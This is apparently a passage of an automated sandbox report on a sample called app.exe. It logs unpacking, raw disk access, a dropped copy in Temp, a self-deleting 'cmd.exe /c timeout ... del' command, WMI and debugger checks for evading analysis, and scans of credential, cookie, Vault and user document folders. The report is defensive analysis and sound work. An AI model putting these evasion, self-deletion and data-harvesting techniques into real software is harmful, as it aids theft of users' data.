Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\timeout.exeSection loaded: edgegdi.dllJump to behavior
Source: C:\Users\user\Desktop\app.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
Source: app.exeStatic file information: File size 1290240 > 1048576
Source: Binary string: SRLPR.pdBf source: app.exe, 00000003.00000003.3101475941.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3127769261.00000000055F6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: grabg::C:\\Users\\user\\Desktop\\GQSZOBXUFX\\RMDIWSRLPR.pdBfGbodyFUk1ESVdTU source: app.exe, 00000003.00000003.3101475941.00000000055E8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: GQSZOBXUFX\\RMDIWSRLPR.pdBfIbodyHUk1ESVdTU source: app.exe, 00000003.00000003.3127769261.00000000055F6000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Source: C:\Users\user\Desktop\app.exe Unpacked PE file: 0.2.app.exe.2560000.2.unpack
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Unpacked PE file: 3.2.app.exe.2530000.2.unpack
Source: C:\Users\user\Desktop\app.exe Code function: 0_2_0042C59F VirtualAlloc,VirtualAlloc,LoadLibraryA,GetProcAddress,0_2_0042C59F
Source: app.exe Static PE information: section name: )m&
Source: app.exe.0.dr Static PE information: section name: )m&
Source: C:\Users\user\Desktop\app.exe Code function: 0_2_00416398 push eax; ret 0_2_004163B6
Source: C:\Users\user\Desktop\app.exe Code function: 0_2_00415460 push eax; ret 0_2_00415474
Source: C:\Users\user\Desktop\app.exe Code function: 0_2_00415460 push eax; ret 0_2_0041549C
Source: C:\Users\user\Desktop\app.exe Code function: 0_2_0047EC7F push FFFFFFA1h; retf 0_2_0047EC82
Source: C:\Users\user\Desktop\app.exe Code function: 0_2_00416F33 push ecx; ret 0_2_00416F43
Source: C:\Users\user\Desktop\app.exe Code function: 0_2_025F23AD push es; iretd 0_2_025F2454
Source: C:\Users\user\Desktop\app.exe Code function: 0_2_025EC6A1 push ecx; ret 0_2_025EC6B4
Source: C:\Users\user\Desktop\app.exe Code function: 0_2_025F3881 push eax; ret 0_2_025F3882
Source: C:\Users\user\Desktop\app.exe Code function: 0_2_025F691F push eax; ret 0_2_025F6997
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Code function: 3_3_0552C6D7 push cs; iretd 3_3_0552C6D8
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Code function: 3_3_055288A8 pushad ; iretd 3_3_055288A9
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Code function: 3_3_05E6B3EB push ss; retf 3_3_05E6B497
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Code function: 3_2_025C23AD push es; iretd 3_2_025C2454
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Code function: 3_2_025BC6A1 push ecx; ret 3_2_025BC6B4
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Code function: 3_2_025C3881 push eax; ret 3_2_025C3882
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Code function: 3_2_025C691F push eax; ret 3_2_025C6997

Persistence and Installation Behavior

Source: C:\Users\user\Desktop\app.exe Code function: CreateFileA,CreateFileA,DeviceIoControl,CloseHandle,CloseHandle,CreateFileA,DeviceIoControl,CloseHandle,CloseHandle,CreateFileA,DeviceIoControl,DeviceIoControl,CloseHandle,CloseHandle,GetSystemDirectoryA,CopyFileA,CreateFileA,DeviceIoControl,CloseHandle,GetCurrentProcess,SetPriorityClass,GetCurrentDirectoryA,CreateFileA,FindResourceA,LoadResource,LockResource,SizeofResource,WriteFile,FreeResource,CloseHandle,CloseHandle,CreateFileA,DeleteFileA,DeviceIoControl,CloseHandle,CloseHandle, \\.\PhysicalDrive%d 0_2_0040A770
Source: C:\Users\user\Desktop\app.exe Code function: CreateFileA,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d 0_2_00409F46
Source: C:\Users\user\Desktop\app.exe File created: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe

Boot Survival

Source: C:\Users\user\Desktop\app.exe Code function: CreateFileA,CreateFileA,DeviceIoControl,CloseHandle,CloseHandle,CreateFileA,DeviceIoControl,CloseHandle,CloseHandle,CreateFileA,DeviceIoControl,DeviceIoControl,CloseHandle,CloseHandle,GetSystemDirectoryA,CopyFileA,CreateFileA,DeviceIoControl,CloseHandle,GetCurrentProcess,SetPriorityClass,GetCurrentDirectoryA,CreateFileA,FindResourceA,LoadResource,LockResource,SizeofResource,WriteFile,FreeResource,CloseHandle,CloseHandle,CreateFileA,DeleteFileA,DeviceIoControl,CloseHandle,CloseHandle, \\.\PhysicalDrive%d 0_2_0040A770
Source: C:\Users\user\Desktop\app.exe Code function: CreateFileA,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d 0_2_00409F46

Hooking and other Techniques for Hiding and Protection

Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Process created: cmd.exe /c timeout /t 5 & del /f /q C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe && exit
Source: C:\Users\user\Desktop\app.exe Code function: 0_2_00401660 IsIconic,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,0_2_00401660
Source: C:\Users\user\Desktop\app.exe Code function: 0_2_0040CFF1 IsIconic,GetWindowPlacement,GetWindowRect,0_2_0040CFF1
Source: C:\Users\user\Desktop\app.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\app.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM CIM_Memory
Source: C:\Users\user\Desktop\app.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_SMBIOSMemory
Source: C:\Users\user\Desktop\app.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_MemoryArray
Source: C:\Users\user\Desktop\app.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_MemoryDevice
Source: C:\Users\user\Desktop\app.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory
Source: C:\Users\user\Desktop\app.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_CacheMemory
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM CIM_Memory
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_SMBIOSMemory
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_MemoryArray
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_MemoryDevice
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_CacheMemory
Source: C:\Users\user\Desktop\app.exe Code function: 0_2_00408FF2 rdtsc 0_2_00408FF2
Source: C:\Users\user\Desktop\app.exe Code function: LoadLibraryA,FreeLibrary,GetAdaptersInfo,GetAdaptersInfo,0_2_00402D69
Source: C:\Users\user\Desktop\app.exe API coverage: 2.6 %
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe API coverage: 8.1 %
Source: C:\Users\user\Desktop\app.exe TID: 1440 Thread sleep count: 53 > 30
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe TID: 6904 Thread sleep count: 68 > 30
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe TID: 1588 Thread sleep time: -60000s >= -30000s
Source: C:\Windows\SysWOW64\timeout.exe TID: 1928 Thread sleep count: 39 > 30
Source: C:\Users\user\Desktop\app.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
Source: C:\Users\user\Desktop\app.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM Win32_Processor
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\app.exe Code function: 0_2_00427361 GetFullPathNameA,lstrcpynA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrcpyA,0_2_00427361
Source: C:\Users\user\Desktop\app.exe Code function: 0_2_025CA710 CloseHandle,FindFirstFileW,FindClose,HeapFree,HeapFree,HeapFree,0_2_025CA710
Source: C:\Users\user\Desktop\app.exe Code function: 0_2_025E4B93 FindFirstFileExW,0_2_025E4B93
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Code function: 3_2_0259A710 CloseHandle,FindFirstFileW,FindClose,HeapFree,HeapFree,HeapFree,3_2_0259A710
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Code function: 3_2_0259FEC0 HeapFree,HeapFree,HeapFree,HeapFree,FindFirstFileW,HeapFree,HeapFree,GetLastError,HeapFree,HeapFree,3_2_0259FEC0
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Code function: 3_2_025B4B93 FindFirstFileExW,3_2_025B4B93
Source: C:\Users\user\Desktop\app.exe Code function: 0_2_0041E91D VirtualQuery,GetSystemInfo,VirtualQuery,VirtualAlloc,VirtualProtect,0_2_0041E91D
Source: app.exe, 00000003.00000003.3112020011.0000000000956000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3123955917.000000000095B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3107954475.0000000000956000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3092789933.0000000000956000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3121520475.000000000095B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3121520475.0000000000956000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3116384116.000000000095B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3123955917.0000000000956000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3098259663.0000000000956000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3126108218.0000000000956000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3099980672.0000000000956000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: app.exe, 00000003.00000002.3294569055.00000000008CF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWh
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\app.exe Code function: 0_2_00408FF2 rdtsc 0_2_00408FF2
Source: C:\Users\user\Desktop\app.exe Code function: 0_2_025E44E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_025E44E2
Source: C:\Users\user\Desktop\app.exe Code function: 0_2_0042C59F VirtualAlloc,VirtualAlloc,LoadLibraryA,GetProcAddress,0_2_0042C59F
Source: C:\Users\user\Desktop\app.exe Code function: 0_2_025CD430 GetProcessHeap,RtlAllocateHeap,0_2_025CD430
Source: C:\Users\user\Desktop\app.exe Code function: 0_2_0041B198 SetUnhandledExceptionFilter,0_2_0041B198
Source: C:\Users\user\Desktop\app.exe Code function: 0_2_0041B1AC SetUnhandledExceptionFilter,0_2_0041B1AC
Source: C:\Users\user\Desktop\app.exe Code function: 0_2_0256EAC0 RtlAddVectoredExceptionHandler,SetThreadStackGuarantee,GetLastError,HeapFree,HeapFree,0_2_0256EAC0
Source: C:\Users\user\Desktop\app.exe Code function: 0_2_025DE0C8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_025DE0C8
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Code function: 3_2_0253EAC0 RtlAddVectoredExceptionHandler,SetThreadStackGuarantee,GetLastError,HeapFree,HeapFree,3_2_0253EAC0
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Code function: 3_2_025AE0C8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_025AE0C8
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Code function: 3_2_025B44E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_025B44E2
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Code function: 3_2_025ADC6E IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_025ADC6E
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Code function: 3_2_025ADDCA SetUnhandledExceptionFilter,3_2_025ADDCA
Source: C:\Users\user\Desktop\app.exe Memory allocated: page read and write | page guard
Source: C:\Users\user\Desktop\app.exe Process created: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe "C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 5
Source: C:\Users\user\Desktop\app.exe Code function: 0_2_00409127 cpuid 0_2_00409127
Source: C:\Users\user\Desktop\app.exe Code function: GetThreadLocale,GetLocaleInfoA,GetACP,0_2_00401000
Source: C:\Users\user\Desktop\app.exe Code function: GetLocaleInfoA,0_2_0041E705
Source: C:\Users\user\Desktop\app.exe Code function: lstrcpyA,wsprintfA,LoadLibraryA,GetLocaleInfoA,0_2_00429E88
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\.curlrc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\3D Objects VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\3D Objects\desktop.ini VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\.curlrc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Adobe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Comms VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\ConnectedDevicesPlatform VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\D3DSCache VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\ElevatedDiagnostics VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Google VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\History VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\IconCache.db VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Intel VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\MicrosoftEdge VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Mozilla VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Packages VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\PeerDistRepub VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Publishers VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Temp VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\VirtualStore VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\_curlrc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\LocalLow VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\LocalLow\Adobe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\LocalLow\Intel VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\LocalLow\Microsoft VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\LocalLow\Mozilla VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Roaming VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Roaming\.curlrc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Roaming\Sun VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Roaming\_curlrc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Roaming\Adobe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Roaming\Adobe\Acrobat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Roaming\Adobe\Flash Player VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Roaming\Adobe\Headlights VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Roaming\Adobe\Linguistics VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Roaming\Adobe\LogTransport2 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\AddIns VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Credentials VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Excel VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\MMC VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Network VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Protect VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Vault VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\SystemExtensionsDev VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Roaming\Sun\Java VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\Contacts VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\Contacts\desktop.ini VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\container.dat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\deprecated.cookie VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\DNTException VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\DNTException\container.dat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\DNTException\Low VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\ESE VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\ESE\container.dat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\Low VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\Low\ESE VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\PrivacIE VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\Desktop VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\Desktop\AFWAAFRXKO VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\Desktop\app.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\Desktop\desktop.ini VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\Desktop\Excel.lnk VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\Desktop\FACWLRWHGG.mp3 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\Desktop\GQSZOBXUFX\GQSZOBXUFX.docx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\Desktop\GQSZOBXUFX\JPEAFKFPZY.png VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\Desktop\GQSZOBXUFX\MLMJAYLPER.xlsx VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\Desktop\GQSZOBXUFX\RMDIWSRLPR.pdf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\Desktop\GQSZOBXUFX\UQMPCTZARJ.mp3 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Queries volume information: C:\Users\user\Desktop\GQSZOBXUFX\YCGNAHEPCK.jpg VolumeInformation
